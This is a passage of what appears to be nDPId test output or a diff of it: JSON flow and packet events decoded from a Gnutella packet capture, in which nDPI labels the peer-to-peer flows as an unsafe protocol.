+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":63001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":63001,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0B1pAAIAGzIUKAAIPVoHEVMQWJrsID0+\/AAAAAIAC+vAKmwAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":63001,"flow_last_seen":63001,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":63001,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":63001,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":63001,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0uwRAAIAG0AgKAAIPL5M0FcQXj3g4QcNOAAAAAIAC+vC1SAAAAgQFtAEDAwgBAQQC"} +00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":174,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":63002,"flow_last_seen":63002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":63002,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.128.217.128","src_port":50200,"dst_port":45194,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":63002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":63002,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xtpAAIAGndkKAAIPsIDZgMQYsIr8Y98AAAAAAIAC+vCOBwAAAgQFtAEDAwgBAQQC"} +00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":175,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":63002,"flow_last_seen":63002,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":63002,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"78.122.93.185","src_port":50201,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":63002,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":63002,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0IqxAAIAGH9YKAAIPTnpducQZGMpcVbolAAAAAIAC+vDIfgAAAgQFtAEDAwgBAQQC"} 00547{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":63029,"flow_last_seen":63029,"flow_idle_time":180000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":63029,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"10.0.2.2","src_port":57622,"dst_port":5351,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00423{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":63029,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":44,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":44,"pkt_l4_len":10,"thread_ts_msec":63029,"pkt":"UlQAEjUCCAAn5uVZCABFAAAegUIAAIARoXwKAAIPCgACAuEWFOcACvHLAAA="} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":63233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63233,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAoYAAEAGCJAvkzQVCgACD494xBcAY5wBOEHDT2AS\/\/882gAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":3,"flow_last_seen":63234,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63234,"pkt":"UlQAEjUCCAAn5uVZCABFAAAouwVAAIAG0BMKAAIPL5M0FcQXj3g4QcNPAGOcAlAQ+vBZpgAA"} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":63250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63250,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAocAAEAGiwHa+gY7CgACDzEMxBQAZJYBrKXgdGAS\/\/+SMQAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":180,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":63250,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63250,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoLR5AAIAG4G0KAAIP2voGO8QUMQyspeB0AGSWAlAQ+vCu\/QAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":181,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"47.147.52.21","src_port":50199,"dst_port":36728,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":182,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63000,"flow_last_seen":63261,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":598,"flow_tot_l4_payload_len":598,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63261,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"218.250.6.59","src_port":50196,"dst_port":12556,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":63297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":63297,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAooAAEAG5kR2qA9HCgACDw9bxBUAZZABIZ4f2mAS\/\/9gyQAAAgQFtA=="} -00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":63297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":63297,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoTFBAAIAGHIIKAAIPdqgPR8QVD1shnh\/aAGWQAlAQ+vB9lQAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":187,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":63001,"flow_last_seen":63309,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":63309,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"118.168.15.71","src_port":50197,"dst_port":3931,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64030,"flow_last_seen":64030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64030,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.238.173.128","src_port":50202,"dst_port":57648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":203,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":64030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64030,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZhAAIAG6a4KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64031,"flow_last_seen":64031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64031,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":204,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":64031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64031,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cDRAAIAGoD8KAAIPPd6gY8QbSjIrqiNHAAAAAIAC+vAskAAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":205,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"124.218.26.16","src_port":50204,"dst_port":9728,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":205,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0FX9AAIAGQkwKAAIPfNoaEMQcJgCBbg3uAAAAAIAC+vBXrQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"114.46.139.171","src_port":50205,"dst_port":52120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":206,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0XTBAAIAGk6sKAAIPci6Lq8Qdy5gelScRAAAAAIAC+vCU2gAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64032,"flow_last_seen":64032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64032,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":207,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":1,"flow_last_seen":64032,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64032,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0yBFAAIAG2fkKAAIPr7Wc9MQeID9tpdrVAAAAAIAC+vDujQAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":64033,"flow_last_seen":64033,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":64033,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.78.171.204","src_port":50207,"dst_port":6346,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":208,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":64033,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64033,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0kpNAAIAGVgcKAAIPWk6rzMQfGMqXoNUlAAAAAIAC+vAYRgAAAgQFtAEDAwgBAQQC"} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":209,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":64213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64213,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoApQAAP8Gwb497q2ACgACD+EwxBoAAAAAK91tIlAUAAB6CAAA"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":210,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":64275,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64275,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApUAAEAGjec93qBjCgACD0oyxBsAZ4QBK6ojSGAS\/\/\/MHQAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":211,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":64276,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64276,"pkt":"UlQAEjUCCAAn5uVZCABFAAAocDVAAIAGoEoKAAIPPd6gY8QbSjIrqiNIAGeEAlAQ+vDo6QAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":212,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64031,"flow_last_seen":64276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":64276,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"61.222.160.99","src_port":50203,"dst_port":18994,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":214,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":64291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":64291,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsApcAAEAGH32vtZz0CgACDyA\/xB4AaH4BbaXa1mAS\/\/+UGgAAAgQFtA=="} -00436{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":215,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":64291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":64291,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoyBJAAIAG2gQKAAIPr7Wc9MQeID9tpdrWAGh+AlAQ+vCw5gAA"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":216,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":64032,"flow_last_seen":64291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":304,"flow_tot_l4_payload_len":304,"flow_avg_l4_payload_len":76,"midstream":0,"thread_ts_msec":64291,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"175.181.156.244","src_port":50206,"dst_port":8255,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":64717,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":64717,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GZlAAIAG6a0KAAIPPe6tgMQa4TAr3W0hAAAAAIAC+vA+WAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"119.237.116.22","src_port":50208,"dst_port":8683,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q8tAAIAGVuYKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65061,"flow_last_seen":65061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65061,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.252.206.254","src_port":50209,"dst_port":49587,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":65061,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65061,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YBAAIAG1DkKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} -00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"36.234.18.166","src_port":50210,"dst_port":61404,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":231,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pW5AAIAGEbcKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"14.199.10.60","src_port":50211,"dst_port":23458,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":232,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0SFBAAIAGjWIKAAIPDscKPMQjW6L9nzYkAAAAAIAC+vD7gwAAAgQFtAEDAwgBAQQC"} -00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":233,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65062,"flow_last_seen":65062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65062,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.17.124.40","src_port":50212,"dst_port":6776,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":233,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":65062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":65062,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVpAAIAG3iEKAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} -00553{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":234,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":65063,"flow_last_seen":65063,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":65063,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"85.117.153.7","src_port":50213,"dst_port":50138,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 